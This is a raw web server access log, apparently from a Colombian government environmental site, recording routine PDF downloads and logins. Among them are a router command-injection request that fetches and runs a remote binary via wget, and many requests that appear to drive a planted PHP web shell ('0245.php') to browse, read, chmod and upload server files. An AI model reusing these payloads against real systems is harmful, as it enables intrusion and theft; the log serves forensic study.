47.128.35.44 - - [25/Apr/2024:06:07:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages%5C&f=page47_thumbnail.jpg&fullhexdump=1 HTTP/1.1" 200 16267
47.128.35.44 - - [25/Apr/2024:06:07:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.35.44 - - [25/Apr/2024:06:07:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
52.70.240.171 - - [25/Apr/2024:06:08:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2849.pdf HTTP/1.1" 200 277358
47.128.35.44 - - [25/Apr/2024:06:08:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.35.44 - - [25/Apr/2024:06:08:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.35.44 - - [25/Apr/2024:06:08:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.35.44 - - [25/Apr/2024:06:08:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.35.44 - - [25/Apr/2024:06:08:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
216.245.221.92 - - [25/Apr/2024:06:08:02 -0500] "HEAD / HTTP/1.1" 200 -
45.142.182.92 - - [25/Apr/2024:06:08:03 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.163.214.97/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 1018
23.22.35.162 - - [25/Apr/2024:06:08:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2316.pdf HTTP/1.1" 200 364655
3.224.220.101 - - [25/Apr/2024:06:08:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2848.pdf HTTP/1.1" 200 278717
52.70.240.171 - - [25/Apr/2024:06:08:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2315.pdf HTTP/1.1" 200 365352
3.224.220.101 - - [25/Apr/2024:06:08:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2847.pdf HTTP/1.1" 200 279970
181.59.244.61 - - [25/Apr/2024:06:08:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 2374796
52.70.240.171 - - [25/Apr/2024:06:08:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2314.pdf HTTP/1.1" 200 365023
66.249.66.20 - - [25/Apr/2024:06:08:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4718.pdf HTTP/1.1" 200 359298
47.128.29.180 - - [25/Apr/2024:06:08:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=tools&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-content%5Cthemes%5Ctwentyfourteen%5Cjs%5C HTTP/1.1" 200 3099
23.22.35.162 - - [25/Apr/2024:06:08:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2846.pdf HTTP/1.1" 200 278975
20.168.251.196 - - [25/Apr/2024:06:08:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2224.pdf HTTP/1.1" 200 443364
3.224.220.101 - - [25/Apr/2024:06:08:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2312.pdf HTTP/1.1" 200 1615592
3.224.220.101 - - [25/Apr/2024:06:08:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2845.pdf HTTP/1.1" 200 281224
23.22.35.162 - - [25/Apr/2024:06:08:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2311.pdf HTTP/1.1" 200 1708249
3.224.220.101 - - [25/Apr/2024:06:08:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2844.pdf HTTP/1.1" 200 278973
23.22.35.162 - - [25/Apr/2024:06:08:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2310.pdf HTTP/1.1" 200 367381
47.128.96.102 - - [25/Apr/2024:06:08:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5Cphpscripts%5C&f=Documentacion+del+Sys.txt HTTP/1.1" 200 2987
47.128.96.102 - - [25/Apr/2024:06:08:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.96.102 - - [25/Apr/2024:06:08:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.96.102 - - [25/Apr/2024:06:08:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.96.102 - - [25/Apr/2024:06:08:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.96.102 - - [25/Apr/2024:06:08:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.96.102 - - [25/Apr/2024:06:08:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.96.102 - - [25/Apr/2024:06:08:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.96.102 - - [25/Apr/2024:06:08:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.96.102 - - [25/Apr/2024:06:08:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
23.22.35.162 - - [25/Apr/2024:06:08:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2843.pdf HTTP/1.1" 200 280567
3.224.220.101 - - [25/Apr/2024:06:08:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2842.pdf HTTP/1.1" 200 369384
3.224.220.101 - - [25/Apr/2024:06:08:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2309.pdf HTTP/1.1" 200 366258
3.224.220.101 - - [25/Apr/2024:06:08:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2841.pdf HTTP/1.1" 200 279043
52.70.240.171 - - [25/Apr/2024:06:09:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2308.pdf HTTP/1.1" 200 355658
3.224.220.101 - - [25/Apr/2024:06:09:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2840.pdf HTTP/1.1" 200 279021
47.128.25.234 - - [25/Apr/2024:06:09:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cfarmaceutica%5Cimages&f=page108_thumbnail.jpg HTTP/1.1" 200 2910
3.224.220.101 - - [25/Apr/2024:06:09:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2307.pdf HTTP/1.1" 200 362310
3.224.220.101 - - [25/Apr/2024:06:09:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2839.pdf HTTP/1.1" 200 279578
52.70.240.171 - - [25/Apr/2024:06:09:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2838.pdf HTTP/1.1" 200 379580
3.224.220.101 - - [25/Apr/2024:06:09:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2306.pdf HTTP/1.1" 200 365126
23.22.35.162 - - [25/Apr/2024:06:09:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2837.pdf HTTP/1.1" 200 302773
3.224.220.101 - - [25/Apr/2024:06:09:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2305.pdf HTTP/1.1" 200 364272
47.128.125.255 - - [25/Apr/2024:06:09:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cnetwork%5C&f=user-edit.php&white=1 HTTP/1.1" 200 397
23.22.35.162 - - [25/Apr/2024:06:09:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2836.pdf HTTP/1.1" 200 279012
3.224.220.101 - - [25/Apr/2024:06:09:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2304.pdf HTTP/1.1" 200 365776
23.22.35.162 - - [25/Apr/2024:06:09:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2835.pdf HTTP/1.1" 200 279619
23.22.35.162 - - [25/Apr/2024:06:09:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2303.pdf HTTP/1.1" 200 365062
52.70.240.171 - - [25/Apr/2024:06:09:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2834.pdf HTTP/1.1" 200 280349
23.22.35.162 - - [25/Apr/2024:06:09:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2832.pdf HTTP/1.1" 200 279280
3.224.220.101 - - [25/Apr/2024:06:09:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2302.pdf HTTP/1.1" 200 364774
47.128.96.231 - - [25/Apr/2024:06:10:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.96.231 - - [25/Apr/2024:06:10:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.96.231 - - [25/Apr/2024:06:10:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.96.231 - - [25/Apr/2024:06:10:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.96.231 - - [25/Apr/2024:06:10:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.96.231 - - [25/Apr/2024:06:10:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.96.231 - - [25/Apr/2024:06:10:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.96.231 - - [25/Apr/2024:06:10:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.96.231 - - [25/Apr/2024:06:10:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.96.231 - - [25/Apr/2024:06:10:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.96.231 - - [25/Apr/2024:06:09:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=4&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages%5C&f=page102_thumbnail.jpg HTTP/1.1" 200 16240
172.22.2.4 - - [25/Apr/2024:06:08:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
3.224.220.101 - - [25/Apr/2024:06:10:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2830.pdf HTTP/1.1" 200 279274
52.70.240.171 - - [25/Apr/2024:06:10:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2301.pdf HTTP/1.1" 200 364818
52.70.240.171 - - [25/Apr/2024:06:10:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2829.pdf HTTP/1.1" 200 279811
23.22.35.162 - - [25/Apr/2024:06:10:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2300.pdf HTTP/1.1" 200 359196
23.22.35.162 - - [25/Apr/2024:06:10:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2827.pdf HTTP/1.1" 200 279050
52.70.240.171 - - [25/Apr/2024:06:10:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2299.pdf HTTP/1.1" 200 1728089
47.128.96.31 - - [25/Apr/2024:06:10:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.96.31 - - [25/Apr/2024:06:10:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.96.31 - - [25/Apr/2024:06:10:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.96.31 - - [25/Apr/2024:06:10:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.96.31 - - [25/Apr/2024:06:10:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.96.31 - - [25/Apr/2024:06:10:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.96.31 - - [25/Apr/2024:06:10:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.96.31 - - [25/Apr/2024:06:10:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.96.31 - - [25/Apr/2024:06:10:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.96.31 - - [25/Apr/2024:06:10:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.96.31 - - [25/Apr/2024:06:10:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=4&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages%5C&f=page70_thumbnail.jpg HTTP/1.1" 200 16267
3.224.220.101 - - [25/Apr/2024:06:10:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2826.pdf HTTP/1.1" 200 280490
3.224.220.101 - - [25/Apr/2024:06:10:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2298.pdf HTTP/1.1" 200 364755
20.168.249.30 - - [25/Apr/2024:06:10:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1249.pdf HTTP/1.1" 200 892645
3.224.220.101 - - [25/Apr/2024:06:10:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2825.pdf HTTP/1.1" 200 302550
52.70.240.171 - - [25/Apr/2024:06:10:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2824.pdf HTTP/1.1" 200 325752
3.224.220.101 - - [25/Apr/2024:06:10:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2297.pdf HTTP/1.1" 200 1696586
3.224.220.101 - - [25/Apr/2024:06:10:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2823.pdf HTTP/1.1" 200 280215
47.128.115.112 - - [25/Apr/2024:06:10:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Cvert&f=8.png HTTP/1.1" 200 15406
47.128.115.112 - - [25/Apr/2024:06:10:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_png HTTP/1.1" 200 175
47.128.115.112 - - [25/Apr/2024:06:10:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.115.112 - - [25/Apr/2024:06:10:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.115.112 - - [25/Apr/2024:06:10:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.115.112 - - [25/Apr/2024:06:10:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.115.112 - - [25/Apr/2024:06:10:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.115.112 - - [25/Apr/2024:06:10:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.115.112 - - [25/Apr/2024:06:10:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.115.112 - - [25/Apr/2024:06:10:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.115.112 - - [25/Apr/2024:06:10:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
23.22.35.162 - - [25/Apr/2024:06:10:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2296.pdf HTTP/1.1" 200 365908
172.22.2.4 - - [25/Apr/2024:06:09:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
52.70.240.171 - - [25/Apr/2024:06:10:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2822.pdf HTTP/1.1" 200 281093
23.22.35.162 - - [25/Apr/2024:06:11:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2294.pdf HTTP/1.1" 200 373449
23.22.35.162 - - [25/Apr/2024:06:11:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2821.pdf HTTP/1.1" 200 392591
52.70.240.171 - - [25/Apr/2024:06:11:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2820.pdf HTTP/1.1" 200 279403
186.84.88.21 - - [25/Apr/2024:06:11:09 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.84.88.21 - - [25/Apr/2024:06:11:09 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:09 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.84.88.21 - - [25/Apr/2024:06:11:09 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12402
186.84.88.21 - - [25/Apr/2024:06:11:10 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:10 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:10 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:10 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:10 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:10 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:10 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:10 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
3.224.220.101 - - [25/Apr/2024:06:11:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2293.pdf HTTP/1.1" 200 677010
47.128.29.179 - - [25/Apr/2024:06:11:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5Cphpscripts%5C&f=pml.php&white=1 HTTP/1.1" 200 3019
52.70.240.171 - - [25/Apr/2024:06:11:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2819.pdf HTTP/1.1" 200 279120
186.84.88.21 - - [25/Apr/2024:06:11:16 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16283
186.84.88.21 - - [25/Apr/2024:06:11:16 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:16 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:16 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:16 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:16 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:16 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
186.84.88.21 - - [25/Apr/2024:06:11:16 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.84.88.21 - - [25/Apr/2024:06:11:16 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
18.223.32.230 - - [25/Apr/2024:06:11:16 -0500] "GET /robots.txt HTTP/1.1" 404 1018
18.223.32.230 - - [25/Apr/2024:06:11:16 -0500] "GET /isolucionsda/FrameSetArticulo.asp?Pagina=/IsolucionSDA/bancoconocimiento/R/Resolucion1188del1deSeptiembrede2003/Resolucion1188del1deSeptiembrede2003.asp?IdArticulo=6529 HTTP/1.1" 200 8107
52.70.240.171 - - [25/Apr/2024:06:11:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2292.pdf HTTP/1.1" 200 351986
52.70.240.171 - - [25/Apr/2024:06:11:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2818.pdf HTTP/1.1" 200 322195
3.224.220.101 - - [25/Apr/2024:06:11:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2280.pdf HTTP/1.1" 200 502882
52.70.240.171 - - [25/Apr/2024:06:11:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2817.pdf HTTP/1.1" 200 372345
47.128.57.185 - - [25/Apr/2024:06:11:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=processes&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5Ctinymce%5Clangs%5C&processes_sort=0d HTTP/1.1" 200 3695
52.70.240.171 - - [25/Apr/2024:06:11:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2279.pdf HTTP/1.1" 200 505863
3.224.220.101 - - [25/Apr/2024:06:11:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2814.pdf HTTP/1.1" 200 626051
23.22.35.162 - - [25/Apr/2024:06:11:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2277.pdf HTTP/1.1" 200 532894
52.70.240.171 - - [25/Apr/2024:06:11:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2811.pdf HTTP/1.1" 200 446347
3.224.220.101 - - [25/Apr/2024:06:11:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2810.pdf HTTP/1.1" 200 293729
23.22.35.162 - - [25/Apr/2024:06:11:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2276.pdf HTTP/1.1" 200 326343
23.22.35.162 - - [25/Apr/2024:06:11:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2809.pdf HTTP/1.1" 200 463083
47.128.57.203 - - [25/Apr/2024:06:12:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=1&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages%5C&f=page97_thumbnail.jpg HTTP/1.1" 200 16267
47.128.57.203 - - [25/Apr/2024:06:12:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.57.203 - - [25/Apr/2024:06:12:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.57.203 - - [25/Apr/2024:06:12:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.57.203 - - [25/Apr/2024:06:12:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.57.203 - - [25/Apr/2024:06:12:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.57.203 - - [25/Apr/2024:06:12:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.57.203 - - [25/Apr/2024:06:12:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.57.203 - - [25/Apr/2024:06:12:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.57.203 - - [25/Apr/2024:06:12:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.57.203 - - [25/Apr/2024:06:12:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
23.22.35.162 - - [25/Apr/2024:06:12:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2275.pdf HTTP/1.1" 200 574309
3.224.220.101 - - [25/Apr/2024:06:12:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2807.pdf HTTP/1.1" 200 273034
52.70.240.171 - - [25/Apr/2024:06:12:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2273.pdf HTTP/1.1" 200 377167
52.70.240.171 - - [25/Apr/2024:06:12:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2271.pdf HTTP/1.1" 200 1329418
23.22.35.162 - - [25/Apr/2024:06:12:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2804.pdf HTTP/1.1" 200 255350
23.22.35.162 - - [25/Apr/2024:06:12:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2270.pdf HTTP/1.1" 200 1450771
47.128.57.244 - - [25/Apr/2024:06:12:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=upload&d=E%3A%5Cnuevo%5Chtdocs%5Ccalculadora2%5Cimages%5C.. HTTP/1.1" 200 2840
52.70.240.171 - - [25/Apr/2024:06:12:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2803.pdf HTTP/1.1" 200 437698
23.22.35.162 - - [25/Apr/2024:06:12:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2269.pdf HTTP/1.1" 200 284960
